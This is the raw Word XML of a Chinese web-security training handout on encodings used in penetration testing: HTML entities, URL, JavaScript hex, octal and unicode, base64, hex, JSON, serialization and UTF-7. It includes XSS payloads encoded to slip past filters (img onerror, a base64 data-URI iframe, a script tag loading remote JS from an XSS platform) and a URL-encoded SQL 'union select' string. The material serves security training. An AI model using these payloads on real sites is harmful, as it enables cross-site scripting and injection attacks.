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WEB安全基础知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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渗透测试中的常用编码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页面编码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在网页设置网页编码 在&lt;head&gt;&lt;/head&gt;中加入设置特定html标签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 xml:space="preserve">&lt;meta charset="utf-8" /&gt;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</w:rPr>
        <w:t>这样页面的编码就会变成utf-8 ，如果没有设置编码就会使用默认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</w:rPr>
        <w:t>的编码，而浏览器默认编码与之不同就会出现乱码。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</w:rPr>
        <w:t xml:space="preserve">常用的有三种格式分别是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</w:rPr>
        <w:t>utf-8、gbk、gbk2312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ascii编码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百度百科 详细介绍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"https://baike.baidu.com/item/ASCII/309296?fr=aladdin&amp;fromid=3712529&amp;fromtitle=ASCII%E7%BC%96%E7%A0%81"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t>https://baike.baidu.com/item/ASCII/309296?fr=aladdin&amp;fromid=3712529&amp;fromtitle=ASCII%E7%BC%96%E7%A0%81</w:t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在渗透测试中常用的标准表 十进制 是 0-127 共128个字符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0" distR="0">
            <wp:extent cx="5274310" cy="3721735"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 0" descr="c2fdfc039245d688c56332adacc27d1ed21b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2fdfc039245d688c56332adacc27d1ed21b245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0" distR="0">
            <wp:extent cx="5274310" cy="3191510"/>
            <wp:effectExtent l="19050" t="0" r="2540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捕获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HTML编码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实体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http://www.w3school.com.cn/html/html_entities.asp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HTML编码的存在就是让他在代码中和显示中分开， 避免错误。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命名实体：构造是&amp;加上希腊字母，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字符编码：构造是&amp;#加十进制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0" distR="0">
            <wp:extent cx="5274310" cy="3862070"/>
            <wp:effectExtent l="19050" t="0" r="254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捕获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十六进制 ASCII码或unicode字符编码，浏览器解析的时候会先把html编码解析再进行渲染。但是有个前提就是必须要在“值”里，比如属性src里，但却不能对src进行html编码。不然浏览器无法正常的渲染。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http://www.qqxiuzi.cn/bianma/zifushiti.php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十六进制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&lt;img src=&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x73;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x77;&amp;#x77;&amp;#x77;&amp;#x2e;&amp;#x62;&amp;#x61;&amp;#x69;&amp;#x64;&amp;#x75;&amp;#x2e;&amp;#x63;&amp;#x6f;&amp;#x6d;&amp;#x2f;&amp;#x69;&amp;#x6d;&amp;#x67;&amp;#x2f;&amp;#x62;&amp;#x64;&amp;#x5f;&amp;#x6c;&amp;#x6f;&amp;#x67;&amp;#x6f;&amp;#x31;&amp;#x2e;&amp;#x70;&amp;#x6e;&amp;#x67;&gt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十进制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&lt;img src=&amp;#104;&amp;#116;&amp;#116;&amp;#112;&amp;#115;&amp;#58;&amp;#47;&amp;#47;&amp;#119;&amp;#119;&amp;#119;&amp;#46;&amp;#98;&amp;#97;&amp;#105;&amp;#100;&amp;#117;&amp;#46;&amp;#99;&amp;#111;&amp;#109;&amp;#47;&amp;#105;&amp;#109;&amp;#103;&amp;#47;&amp;#98;&amp;#100;&amp;#95;&amp;#108;&amp;#111;&amp;#103;&amp;#111;&amp;#49;&amp;#46;&amp;#112;&amp;#110;&amp;#103;&gt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xss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&lt;img src="x" onerror="&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;" /&gt;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URL编码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URL编码是一种多功能技术，可以通过它来战胜多种类型的输入过滤器。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URL编码的最基本表示方式是使用问题字符的十六进制ASCII编码来替换它们，并在ASCII编码前加%。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例如，单引号字符的ASCII码为0x27，其URL编码的表示方式为%27。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"http://www.moonsec.com/index.php?keyword=aa%20union%20seelct"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t>http://www.moonsec.com/index.php?keyword=aa%20union%20seelct</w:t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js编码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&lt;script&gt;alert("Hello world!");&lt;/script&gt;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javascript的十六进制编码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\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x22\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x21\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E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javascript的八进制编码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\74\163\143\162\151\160\164\76\141\154\145\162\164\50\42\110\145\154\154\157\40\167\157\162\154\144\41\42\51\73\74\57\163\143\162\151\160\164\76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http://www.jb51.net/tools/zhuanhuan.htm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javascript unicode编码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&lt;img src="1.jpg" /&gt;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&lt;script src=http://xsst.sinaapp.com/m.js&gt;&lt;/script&gt;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&lt;embed src=http://1.com/1.swf  allowscriptaccess=always&gt;&lt;/embed&gt;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\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0048\u0065\u006c\u006c\u006f\u0020\u0077\u006f\u0072\u006c\u0064\u0021\u0022\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020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http://www.msxindl.com/tools/unicode16.asp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"https://www.toolmao.com/xsstranser"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t>https://www.toolmao.com/xsstranser</w:t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hex编码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这种编码常用于数据库中 转码过后要加上0x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例如 a的hex码是61 如果在数据库使用要加上0x61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0" distR="0">
            <wp:extent cx="4057650" cy="3962400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4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捕获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base64编码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BASE64 编码是一种常用的字符编码，在很多地方都会用到。但base64不是安全领域下的加密解密算法。能起到安全作用的效果很差，而且很容易破解，他核心作用应该是传输数据的正确性，有些网关或系统只能使用ASCII字符。Base64就是用来将非ASCII字符的数据转换成ASCII字符的一种方法，而且base64特别适合在http，mime协议下快速传输数据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&lt;iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='&gt;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json编码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JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式，易于阅读和编写，同时也易于机器解析和生成。它基于ECMA262语言规范（1999-12第三版）中JavaScript编程语言的一个子集。 JSON采用与编程语言无关的文本格式，但是也使用了类C语言（包括C， C++， C#， Java， JavaScript， Perl， Python等）的习惯，这些特性使JSON成为理想的数据交换格式。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[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"Name": "a1",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"Number": "123",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"Contno": "000",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"QQNo": ""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"Name": "a1",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"Number": "123",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"Contno": "000",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"QQNo": ""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"Name": "a1",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"Number": "123",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"Contno": "000",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    "QQNo": ""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]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&lt;?php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$data='[{"Name":"a1","Number":"123","Contno":"000","QQNo":""},{"Name":"a1","Number":"123","Contno":"000","QQNo":""},{"Name":"a1","Number":"123","Contno":"000","QQNo":""}]'; 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$json=json_decode($data); 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print_r($json);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?&gt;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序列化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序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间，对象将其当前状态写入到临时或持久性存储区。以后，可以通过从存储区中读取或反序列化对象的状态，重新创建该对象。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百度百科详细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"https://baike.baidu.com/item/%E5%BA%8F%E5%88%97%E5%8C%96/2890184?fr=aladdin"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t>https://baike.baidu.com/item/%E5%BA%8F%E5%88%97%E5%8C%96/2890184?fr=aladdin</w:t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a:3:{i:0;s:3:"Moe";i:1;s:5:"Larry";i:2;s:5:"Curly";}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 xml:space="preserve">&lt;?php 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$stooges = array('Moe','Larry','Curly');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$new = serialize($stooges);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print_r($new);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echo "&lt;br /&gt;";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print_r(unserialize($new));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?&gt;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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>utf7编码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UTF-7 (7-位元 Unicode 转换格式（Unicode Transformation Format，简写成 UTF））是一种可变长度字符编码方式， 用以将 Unicode 字符以 ASCII 编码的字符串来呈现，可以应用在电子邮件传输之类的应用。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moonsec +AG0AbwBv-n+AHM-e+AGM-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"https://web2hack.org/xssee/"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</w:rPr>
        <w:t>https://web2hack.org/xssee/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/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内部文档</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:t>请勿外传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暗月内部WEB安全培训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8621443">
    <w:nsid w:val="7EE02F83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7EE02F83"/>
    <w:lvl w:ilvl="0" w:tentative="1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28621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13CE2"/>
    <w:rsid w:val="00056676"/>
    <w:rsid w:val="0006632F"/>
    <w:rsid w:val="000F7424"/>
    <w:rsid w:val="00140A18"/>
    <w:rsid w:val="0016028D"/>
    <w:rsid w:val="0017353D"/>
    <w:rsid w:val="001935DA"/>
    <w:rsid w:val="00273DDE"/>
    <w:rsid w:val="00295191"/>
    <w:rsid w:val="003007E7"/>
    <w:rsid w:val="00323044"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="00377968"/>
    <w:rsid w:val="00384DC1"/>
    <w:rsid w:val="003C106F"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="00404027"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00435338"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00520AB2"/>
    <w:rsid w:val="00543BC5"/>
    <w:rsid w:val="005B5073"/>
    <w:rsid w:val="005D4E79"/>
    <w:rsid w:val="005D7733"/>
    <w:rsid w:val="005F2A4F"/>
    <w:rsid w:val="005F754D"/>
    <w:rsid w:val="006266B1"/>
    <w:rsid w:val="00677FB5"/>
    <w:rsid w:val="006B12D5"/>
    <w:rsid w:val="006E3E21"/>
    <w:rsid w:val="006E4F4F"/>
    <w:rsid w:val="00726D19"/>
    <w:rsid w:val="0075159C"/>
    <w:rsid w:val="00877AFC"/>
    <w:rsid w:val="008A43B1"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="008D1486"/>
    <w:rsid w:val="008D5719"/>
    <w:rsid w:val="008D7F3F"/>
    <w:rsid w:val="008E109B"/>
    <w:rsid w:val="00910C50"/>
    <w:rsid w:val="00984ACD"/>
    <w:rsid w:val="009B7DB9"/>
    <w:rsid w:val="009F07D3"/>
    <w:rsid w:val="00A040D0"/>
    <w:rsid w:val="00A41743"/>
    <w:rsid w:val="00A43CC1"/>
    <w:rsid w:val="00AA3513"/>
    <w:rsid w:val="00AC628F"/>
    <w:rsid w:val="00AD5664"/>
    <w:rsid w:val="00AE6D2F"/>
    <w:rsid w:val="00AF5CBA"/>
    <w:rsid w:val="00B17F62"/>
    <w:rsid w:val="00B279CC"/>
    <w:rsid w:val="00B34D4F"/>
    <w:rsid w:val="00B9733F"/>
    <w:rsid w:val="00BD72C8"/>
    <w:rsid w:val="00D02360"/>
    <w:rsid w:val="00D07E10"/>
    <w:rsid w:val="00D13796"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D558DB"/>
    <w:rsid w:val="00D744D7"/>
    <w:rsid w:val="00DA564D"/>
    <w:rsid w:val="00E0246B"/>
    <w:rsid w:val="00E31A4D"/>
    <w:rsid w:val="00E97F20"/>
    <w:rsid w:val="00EB0B2D"/>
    <w:rsid w:val="00F05F15"/>
    <w:rsid w:val="00F2192E"/>
    <w:rsid w:val="00F35145"/>
    <w:rsid w:val="00F679BE"/>
    <w:rsid w:val="072D7BBD"/>
    <w:rsid w:val="180A55F3"/>
    <w:rsid w:val="191427D9"/>
    <w:rsid w:val="1D701BB0"/>
    <w:rsid w:val="1DCE7697"/>
    <w:rsid w:val="27422811"/>
    <w:rsid w:val="2DF704A5"/>
    <w:rsid w:val="2F732D33"/>
    <w:rsid w:val="32DE6112"/>
    <w:rsid w:val="34DA6F2F"/>
    <w:rsid w:val="3DD6093C"/>
    <w:rsid w:val="402839C6"/>
    <w:rsid w:val="416F2BFB"/>
    <w:rsid w:val="42976555"/>
    <w:rsid w:val="450A50C9"/>
    <w:rsid w:val="45643220"/>
    <w:rsid w:val="47C45BEC"/>
    <w:rsid w:val="497A49CF"/>
    <w:rsid w:val="4EA5692E"/>
    <w:rsid w:val="5B873FF6"/>
    <w:rsid w:val="5D0773EE"/>
    <w:rsid w:val="67855936"/>
    <w:rsid w:val="68FC78B6"/>
    <w:rsid w:val="731E0855"/>
    <w:rsid w:val="7D0D0F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0">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="9"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9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9"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1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9">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="9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21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01D7A5-A905-4E39-B008-5C7628EC3F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3663</Characters>
  <Lines>30</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4297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MSI-NB</dc:creator>
  <cp:lastModifiedBy>MSI-NB</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-13T07:41:44Z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